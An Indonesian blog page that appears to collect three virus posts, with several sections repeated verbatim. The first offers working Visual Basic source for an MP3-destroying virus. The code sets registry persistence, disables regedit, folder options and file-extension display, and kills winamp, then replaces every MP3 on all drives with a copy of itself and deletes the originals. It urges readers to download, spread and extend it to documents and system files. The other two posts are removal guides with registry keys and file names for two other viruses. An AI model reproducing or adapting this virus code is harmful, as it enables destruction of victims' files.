Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.
Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!
Hoahhmmm...tiba2 saja rasa malas saya menyerang...o iya untuk anda yang mau mengubah2 source code virus download aja virusnya dan sourcodenya di link ini :
DOWNLOAD VIRUS MP3VIRII DAN SOURCODENYA
Virus MP3 virii
Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda...yaaaaaaa....gak enak dunk...lah namanya membuat virus ya buebas dooo....masak mau ditahan2....hueheheheheh...., ciri2 yang dari virus ini adalah :
1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif
bisa dilihat pada code dibawah ini:
Dim titik As String
titik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide
2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :
'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer
'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If
' frmMain.Visible = True
End Sub
Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer
Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next
3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:
'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")
'Screen.MousePointer = vbHourglass
'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long
fPath = AddBackslash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
'Set li = Nothing
'Screen.MousePointer = vbDefault
End Sub
Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.
-------------------------------TIPS SETAN-----------------------------------
COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------
Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.
Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!
Hoahhmmm...tiba2 saja rasa malas saya menyerang...o iya untuk anda yang mau mengubah2 source code virus download aja virusnya dan sourcodenya di link ini :
DOWNLOAD VIRUS MP3VIRII DAN SOURCODENYA
VIRUS Pemakan File MS Word w32.fluburung@raven
Ternyata gagak tidak hanya sebagai burung pemakan daging, tapi di dunia cyber, gagak atau raven memakan file – file Microsoft word anda, WATCH OUT for this virus…
Code Name : w32.fluburung@raven.com
Nilai crc32 : 92CCA704 dan BDB819EB
Besar File : 104 Kb
Mulai lagi virus yang memakan file .doc atasu dokumen microsoft word anda, untuk itulah pentingnya sistem restore di sini, coba baca lagi artikel di virologi dengan alamat :
http://virologi.info/virologist/modules/news/article.php?storyid=85
Hanya itu cara P3K untuk mengembalikan file – file dokumen microsoft word anda, karena virus ini menyisipkan kode ke dokumen word anda, sehingga dokumen word menjadi rusak. Virus juga mengubah icon microsoft word anda mejadi icon Microsoft Word XP dan mengubah ekstensi file menjadi .scr seperti pada gambar di bawah ini:
Tetapi seperti gambar di atas virus tidak merubah nama dan ukuran file, hebat, kemajuan…kenapa?Karena virus memakai packer dotFix FakeSigner v2.2, yaitu pembungkus virus yang dapat mengelabui Hexeditor, yaitu dengan cara menyembunyikan PE Header File agar pembungkusnya tidak kelihatan. Sebenarnya Pembungkus file yang asli adalah Aspack dan virus tersebut dapat dibukai memakai software Unaspack atau AspackDie. Maka kelihatan ukuran asli file virus adalah 104 Kb.
MELIHAT PESAN VIRUS
Untuk melihat Pesan virus, cukup ikuti langkah berikut:
1. Unpack file virus dengan program pembongkar Aspackdie
2. Maka file yang tadi berukuran sejumlah file doc yang belum terinfeksi menjadi 104 kb. Misalnya file doc-nya sebelumnya berukuran 1,224 Kb, maka sehabis dibongkar pembungkusnya menjadi berukuran 104 kb.
3. Ganti ekstensi file dari .scr menjadi .doc, kemudian buku memakai MS WORD, maka akan terlihat pesan sbb :
======= FLU BURUNG =======
| |
= Oleh-oleh dari AMBON.. =
| Katong pung jua bisa |
==========================
==========================
Bugs Bunny say "What's up doc?"
Duffy Duck say "I'm infected doc"
So at the end of story they save the screen.
PAJAK? Semua hal kena pajak!
Barang mewah kena pajak, nabung di bank tiap bulan potong pajak,
penghasilan kena pajak, sampai makanan pun kena pajak.
Indonesia penuh dengan pajak! Tidak heran penuh pembajak.
Orang bijak bayar pajak, takut pajak jadi pembajak.
Cuma udara yang dihirup yang tidak kena pajak, namun sudah tercemar
dengan asap dan polutan. "Tanya kenapa?"
(Raven codename "05062705056127019455")
MSG (Monosodium Glutamat) merupakan penyebab kebodohan yang berakibat kemalasan.
Pantas bangsa Indonesia tidak bisa maju karena bangsanya bodoh.
Hampir semua produk makanan Indonesia menggunakan MSG.
Pemerintah harus segera menghapuskan penggunaan MSG dipasaran!
Mungkin karena para pejabat dan wakil rakyat otaknya juga sudah penuh dengan MSG,
jadi tidak dapat berpikir dengan benar!
Atau mereka terpilih karena terpintar diantara yang terbodoh,
ataukah memang sengaja membodohkan bangsa agar dapat korupsi dangan leluasa?
(Raven codename "05062705056127019455")
Flu burung, masa sich burungnya bisa flu? Tanya kenapa?
Awas bahaya flu burung, bahaya lo? Bisa RIP tau?
(RIP "Rest in Peace"/Constantine)
Rupiah kebanyakan angka! (Okinawa)
Dimana sebenarnya pemerintah ??????
Pemerintah sekarang ini lebih memilih uang uang dan uang.
Malahan sekarang lebih lebih untuk masalah pilkada pilkada dan pilkada.
Kita sebagai mahasiswa dan masyarakat merasa terasingkan dari perhatian pemerintah.
Tanya kenapa ????
Lihat saja pengangguran banyak sekali!!!
Sebenarnya siapa yang bisa ngomongin dengan pemerintah ?????
Aku????? Ga mungin lagi.
Tapi mudah-mudahan pemerintah sadar sendiri aja yaaa!!!
Slamat Muaaach!!! (Dino Gitchu)
Idiiih....!
What ta gud message……
MANIPULASI REGISTRY
Virus ini memanipulasi registri anda pada alamat:
HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
FILE INDUK VIRUS
Kali ini file induk virus tidak berada di C:\Windows atau di C:\Windows\System32, tapi berada di d:\Recycle Bin dengan nama SVCHOST.EXE dengan icon Folder Berwarna Kuning atau Icon MS Word
KEBIASAAN VIRUS
Pada jam tertentu akan memunculkan pesan seperti pada pesan diatas, atau memunculkan kotak yang berisi ‘Masukkan nama – nama orang sakti:’, jika tidak memasukkan nama – nama orang tersebut maka komputer akan restart atau mengunci system, jika ada pertanyaan seperti itu masukkan saja nama orang2 yang ‘mungkin’ anggota komunitas dari virus ini, yaitu:
SpiderWeb
MoonDance
NigthStalker
Raven
Kemudian ada pertanyaan, lagi pilih makan atau mati…wah wah wah makin kreatip aja ini orang…..
PENANGGULANGAN
1. Donlot showkillprocess.exe dan WAV 2005 yang ada di www.virologi.info/download
2. Matikan proses SVCHOST.EXE yang mempunyai Base Priority dan Point Of Threads 8 dan 1
3. Scan salah satu folder (dengan signatures.db , bisa didonlot di www.virologi.info/download/signatures.db dengan WAV 2005, yang berguna untuk membuka kunci registry dan menampilkan file hidden.
4. Hapus Registry yang ada di alamat berikut:
HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
5. hapus File induk virus dengan nama SVCHOST.EXE yang ada di D:\Recycle Bin
6. Cari file dengan ekstensi *.scr dengan icon MS WORD, kemudian hapus file tersebut.
PENANGGULANGAN UNTUK FILE YANG HILANG
Untuk file word yang hilang anda dapat menggunakan SYSTEM RESTORE yang ada di windows, dengan catatan kalian tau tanggal berapa system kalian belum terkena virus, kemudian ikuti cara untuk me-Restore System di artikel:
http://virologi.info/virologist/modules/news/article.php?storyid=85
gitu aja…semoga bermanfaat,
Code Name : w32.fluburung@raven.com
Nilai crc32 : 92CCA704 dan BDB819EB
Besar File : 104 Kb
Mulai lagi virus yang memakan file .doc atasu dokumen microsoft word anda, untuk itulah pentingnya sistem restore di sini, coba baca lagi artikel di virologi dengan alamat :
http://virologi.info/virologist/modules/news/article.php?storyid=85
Hanya itu cara P3K untuk mengembalikan file – file dokumen microsoft word anda, karena virus ini menyisipkan kode ke dokumen word anda, sehingga dokumen word menjadi rusak. Virus juga mengubah icon microsoft word anda mejadi icon Microsoft Word XP dan mengubah ekstensi file menjadi .scr seperti pada gambar di bawah ini:
Tetapi seperti gambar di atas virus tidak merubah nama dan ukuran file, hebat, kemajuan…kenapa?Karena virus memakai packer dotFix FakeSigner v2.2, yaitu pembungkus virus yang dapat mengelabui Hexeditor, yaitu dengan cara menyembunyikan PE Header File agar pembungkusnya tidak kelihatan. Sebenarnya Pembungkus file yang asli adalah Aspack dan virus tersebut dapat dibukai memakai software Unaspack atau AspackDie. Maka kelihatan ukuran asli file virus adalah 104 Kb.
MELIHAT PESAN VIRUS
Untuk melihat Pesan virus, cukup ikuti langkah berikut:
1. Unpack file virus dengan program pembongkar Aspackdie
2. Maka file yang tadi berukuran sejumlah file doc yang belum terinfeksi menjadi 104 kb. Misalnya file doc-nya sebelumnya berukuran 1,224 Kb, maka sehabis dibongkar pembungkusnya menjadi berukuran 104 kb.
3. Ganti ekstensi file dari .scr menjadi .doc, kemudian buku memakai MS WORD, maka akan terlihat pesan sbb :
======= FLU BURUNG =======
| |
= Oleh-oleh dari AMBON.. =
| Katong pung jua bisa |
==========================
==========================
Bugs Bunny say "What's up doc?"
Duffy Duck say "I'm infected doc"
So at the end of story they save the screen.
PAJAK? Semua hal kena pajak!
Barang mewah kena pajak, nabung di bank tiap bulan potong pajak,
penghasilan kena pajak, sampai makanan pun kena pajak.
Indonesia penuh dengan pajak! Tidak heran penuh pembajak.
Orang bijak bayar pajak, takut pajak jadi pembajak.
Cuma udara yang dihirup yang tidak kena pajak, namun sudah tercemar
dengan asap dan polutan. "Tanya kenapa?"
(Raven codename "05062705056127019455")
MSG (Monosodium Glutamat) merupakan penyebab kebodohan yang berakibat kemalasan.
Pantas bangsa Indonesia tidak bisa maju karena bangsanya bodoh.
Hampir semua produk makanan Indonesia menggunakan MSG.
Pemerintah harus segera menghapuskan penggunaan MSG dipasaran!
Mungkin karena para pejabat dan wakil rakyat otaknya juga sudah penuh dengan MSG,
jadi tidak dapat berpikir dengan benar!
Atau mereka terpilih karena terpintar diantara yang terbodoh,
ataukah memang sengaja membodohkan bangsa agar dapat korupsi dangan leluasa?
(Raven codename "05062705056127019455")
Flu burung, masa sich burungnya bisa flu? Tanya kenapa?
Awas bahaya flu burung, bahaya lo? Bisa RIP tau?
(RIP "Rest in Peace"/Constantine)
Rupiah kebanyakan angka! (Okinawa)
Dimana sebenarnya pemerintah ??????
Pemerintah sekarang ini lebih memilih uang uang dan uang.
Malahan sekarang lebih lebih untuk masalah pilkada pilkada dan pilkada.
Kita sebagai mahasiswa dan masyarakat merasa terasingkan dari perhatian pemerintah.
Tanya kenapa ????
Lihat saja pengangguran banyak sekali!!!
Sebenarnya siapa yang bisa ngomongin dengan pemerintah ?????
Aku????? Ga mungin lagi.
Tapi mudah-mudahan pemerintah sadar sendiri aja yaaa!!!
Slamat Muaaach!!! (Dino Gitchu)
Idiiih....!
What ta gud message……
MANIPULASI REGISTRY
Virus ini memanipulasi registri anda pada alamat:
HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
FILE INDUK VIRUS
Kali ini file induk virus tidak berada di C:\Windows atau di C:\Windows\System32, tapi berada di d:\Recycle Bin dengan nama SVCHOST.EXE dengan icon Folder Berwarna Kuning atau Icon MS Word
KEBIASAAN VIRUS
Pada jam tertentu akan memunculkan pesan seperti pada pesan diatas, atau memunculkan kotak yang berisi ‘Masukkan nama – nama orang sakti:’, jika tidak memasukkan nama – nama orang tersebut maka komputer akan restart atau mengunci system, jika ada pertanyaan seperti itu masukkan saja nama orang2 yang ‘mungkin’ anggota komunitas dari virus ini, yaitu:
SpiderWeb
MoonDance
NigthStalker
Raven
Kemudian ada pertanyaan, lagi pilih makan atau mati…wah wah wah makin kreatip aja ini orang…..
PENANGGULANGAN
1. Donlot showkillprocess.exe dan WAV 2005 yang ada di www.virologi.info/download
2. Matikan proses SVCHOST.EXE yang mempunyai Base Priority dan Point Of Threads 8 dan 1
3. Scan salah satu folder (dengan signatures.db , bisa didonlot di www.virologi.info/download/signatures.db dengan WAV 2005, yang berguna untuk membuka kunci registry dan menampilkan file hidden.
4. Hapus Registry yang ada di alamat berikut:
HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
5. hapus File induk virus dengan nama SVCHOST.EXE yang ada di D:\Recycle Bin
6. Cari file dengan ekstensi *.scr dengan icon MS WORD, kemudian hapus file tersebut.
PENANGGULANGAN UNTUK FILE YANG HILANG
Untuk file word yang hilang anda dapat menggunakan SYSTEM RESTORE yang ada di windows, dengan catatan kalian tau tanggal berapa system kalian belum terkena virus, kemudian ikuti cara untuk me-Restore System di artikel:
http://virologi.info/virologist/modules/news/article.php?storyid=85
gitu aja…semoga bermanfaat,
Brontok tapi bukan brontok
hi...ketemu lagi.....virus - virus banyak bertebaran di ruang angkasa....semakin lama semakin nakal para virus ini. Ada yang menghapus file, ada yang menyembunyikan folder. Nah sama kayak virus yang emang mirip brontok ini.
Kok bisa mirip brontok sih mas? Iya...coba lihat gambar berikut ini, jadi file virusnya mempunyai icon berwarna kuning dengan nama file sama dengan folder, folder yang ada di drive anda. misalnya anda punya folder bernama "My Documents", maka virus ini akan membuat file virus dengan nama "My Documents.exe".
CIRI - CIRI YANG TERKENA VIRUS
Ciri - ciri komputer yang terkena virus ini adalah:
1. Menu Run, Search disembunyikan
2. Regedit dan MSCONFIG tidak dapat dibuka
3. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus
4. Muncul user bernama Ign. Basuki
5. Di My Documents Muncul file :
- Data Ign. Basuki.exe
- Lagu - Server.scr
- Love Song.scr
- New mp3 BaraT !!.exe
- Norman virus Control 5.18.exe
- Windows Vista setup.scr
6. Di direktori C:\Documents and Settings\ ada direktori bernama Ign. Basuki, karena virus membuat user Ign. Basuki
UNTUK ITU BERHATI - HATILAH BAGI PARA ADMIN YANG MEMPUNYAI KOMPUTER SERVER DAN TERKENA VIRUS TERSEBUT. VIRUS INI MEMBUAT USER Ign. BASUKI. MAKA KOMPUTER YANG TERINFEKSI, ATAU SERVER ANDA DAPAT DIMASUKI OLEH ORANG LAIN DENGAN USER Ign. BASUKI---------------------------------------------------------
FILE INDUK VIRUS
File induk virus terletak di :
C:\WINDOWS\ dengan nama file p096743.exe
C:\Windows\ dengan nama file EmangEloh.exe
Sedangkan file lainnya bernama :
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
REGEDIT
Virus mengubah beberapa nilai registri di:
Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
T085
Value:
p096743.exe
Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
T085
Value:
jb3248432.exe
Alamat:
Hkey_Local_Machine/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
System
Value:
C:\Windows\EmangEloh.exe
PESAN SPONSOR
Pesan sponsor yang ditampilkan oleh virus seperti tulisan di bawah ini:
wah wah wah...manisnya.....hiks hiks jadi pengen nangich....
1. Download ShowKillProcess.exe di www.virologi.info/download/
2. Jalankan ShowKillProcess.exe, cari nama process di bawah ini dan kill :
p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
3. Dengan memakai WAVBeta update terbaru, Scan File Virus tersebut, terutama di direktori:
- My Documents
- C:\Documents and Settings
- C:\Windows\
4. Cari File dengan nama di bawah ini dan hapus:
p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
Data Ign. Basuki.exe
Lagu - Server.scr
Love Song.scr
New mp3 BaraT !!.exe
Norman virus Control 5.18.exe
Windows Vista setup.scr
5. Cari file aplikasi dengan besar 42 kb dan punya icon direktori berwarna kuning.
6. Buka MSConfig dan hilangkan tanda centang pada nama Ino
7. Login Sebagai Administrator, hapus user dengan nama Ign. Basuki
8. Kemudian Hapus Folder Ign. Basuki yang ada di C:\Documents and Settings
Kok bisa mirip brontok sih mas? Iya...coba lihat gambar berikut ini, jadi file virusnya mempunyai icon berwarna kuning dengan nama file sama dengan folder, folder yang ada di drive anda. misalnya anda punya folder bernama "My Documents", maka virus ini akan membuat file virus dengan nama "My Documents.exe".
CIRI - CIRI YANG TERKENA VIRUS
Ciri - ciri komputer yang terkena virus ini adalah:
1. Menu Run, Search disembunyikan
2. Regedit dan MSCONFIG tidak dapat dibuka
3. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus
4. Muncul user bernama Ign. Basuki
5. Di My Documents Muncul file :
- Data Ign. Basuki.exe
- Lagu - Server.scr
- Love Song.scr
- New mp3 BaraT !!.exe
- Norman virus Control 5.18.exe
- Windows Vista setup.scr
6. Di direktori C:\Documents and Settings\ ada direktori bernama Ign. Basuki, karena virus membuat user Ign. Basuki
UNTUK ITU BERHATI - HATILAH BAGI PARA ADMIN YANG MEMPUNYAI KOMPUTER SERVER DAN TERKENA VIRUS TERSEBUT. VIRUS INI MEMBUAT USER Ign. BASUKI. MAKA KOMPUTER YANG TERINFEKSI, ATAU SERVER ANDA DAPAT DIMASUKI OLEH ORANG LAIN DENGAN USER Ign. BASUKI---------------------------------------------------------
FILE INDUK VIRUS
File induk virus terletak di :
C:\WINDOWS\ dengan nama file p096743.exe
C:\Windows\ dengan nama file EmangEloh.exe
Sedangkan file lainnya bernama :
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
REGEDIT
Virus mengubah beberapa nilai registri di:
Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
T085
Value:
p096743.exe
Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
T085
Value:
jb3248432.exe
Alamat:
Hkey_Local_Machine/Software/Microsoft/Windows/CurrentVerrsion/Run
Key:
System
Value:
C:\Windows\EmangEloh.exe
PESAN SPONSOR
Pesan sponsor yang ditampilkan oleh virus seperti tulisan di bawah ini:
MoonligHt[A]
they still hurt me ..
in the Moonlight , ill die
i can't wait tommorow ,
it's so much to long
goodbye Sickness
Specially to LanElitta
they still hurt me ..
in the Moonlight , ill die
i can't wait tommorow ,
it's so much to long
goodbye Sickness
Specially to LanElitta
Gw Sadar Kalo Kitamemang tidak bisa bersatu di dunia fana : (
sekarang bagi gw kematian begitu indah di mata gw
sekarang bagi gw kematian begitu indah di mata gw
by | HellSPAWN |
wah wah wah...manisnya.....hiks hiks jadi pengen nangich....
PENANGGULANGAN
1. Download ShowKillProcess.exe di www.virologi.info/download/
2. Jalankan ShowKillProcess.exe, cari nama process di bawah ini dan kill :
p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
3. Dengan memakai WAVBeta update terbaru, Scan File Virus tersebut, terutama di direktori:
- My Documents
- C:\Documents and Settings
- C:\Windows\
4. Cari File dengan nama di bawah ini dan hapus:
p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
Data Ign. Basuki.exe
Lagu - Server.scr
Love Song.scr
New mp3 BaraT !!.exe
Norman virus Control 5.18.exe
Windows Vista setup.scr
5. Cari file aplikasi dengan besar 42 kb dan punya icon direktori berwarna kuning.
6. Buka MSConfig dan hilangkan tanda centang pada nama Ino
7. Login Sebagai Administrator, hapus user dengan nama Ign. Basuki
8. Kemudian Hapus Folder Ign. Basuki yang ada di C:\Documents and Settings
Subscribe to:
Posts (Atom)